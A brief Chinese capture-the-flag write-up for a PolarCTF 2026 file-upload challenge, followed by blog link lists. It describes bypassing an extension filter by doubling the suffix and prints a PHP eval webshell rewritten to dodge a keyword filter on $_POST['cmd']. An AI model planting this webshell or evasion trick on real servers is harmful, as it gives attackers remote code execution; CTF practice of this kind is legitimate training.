【PolarCTF2026年春季挑战赛】GET

大方子2026-03-29 11:17

直接上传一个php试试

文件名后缀双写可以绕过

可以解析,我们上传一句话木马

提示出现了$_POST['cmd']

那么用下面的webshell,避免POST和cmd一起出现

php 复制代码 
<?php $x = $_POST; @eval($x['cmd']); ?>

上传成功,访问一下

得到flag{73121d2832f501293a2e661c4d3a082f}

相关推荐
bluechips·zhao3 小时前
帝国CMS 8.0 安全审计分析——代码审计
安全·网络安全·代码审计
W.A委员会3 小时前
常见网络攻击
网络·http·网络安全
大方子5 小时前
【好靶场】ETag权限混淆漏洞
网络安全·好靶场
星依网络11 小时前
紧急预警!Redis未授权访问漏洞利用与防护实战指南
网络安全
PinTrust SSL证书12 小时前
Geotrust企业型OV通配符SSL
网络协议·网络安全·小程序·https·云计算·ssl
Chengbei1113 小时前
Fortify_SCA_26.1版下载(OpenText SAST(Fortify SCA)26.1 windows/Linux/Mac)全版本下载
运维·安全·web安全·macos·网络安全·系统安全·代码审计
网络安全许木14 小时前
自学渗透测试第18天(Powershell与远程连接)
linux·网络安全·渗透测试·kali linux
oi..14 小时前
从 0 到 1:文件上传漏洞的校验、绕过与真实场景利用
网络·笔记·计算机网络·安全·web安全·网络安全·xss
2401_8734794015 小时前
通过IP地址查询判断网络风险,有哪些具体指标和判断方法?
网络·tcp/ip·网络安全
大方子15 小时前
【好靶场】WebSocket也可以有越权
网络安全·好靶场
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析05GPT-6发布日深度解析-Symphony架构200万Token实战06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛08从零部署 Hermes Agent:一只"会成长的 AI 马"保姆级安装教程09从限购到畅通:GLM-5.1 Coding Plan接入攻略10基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南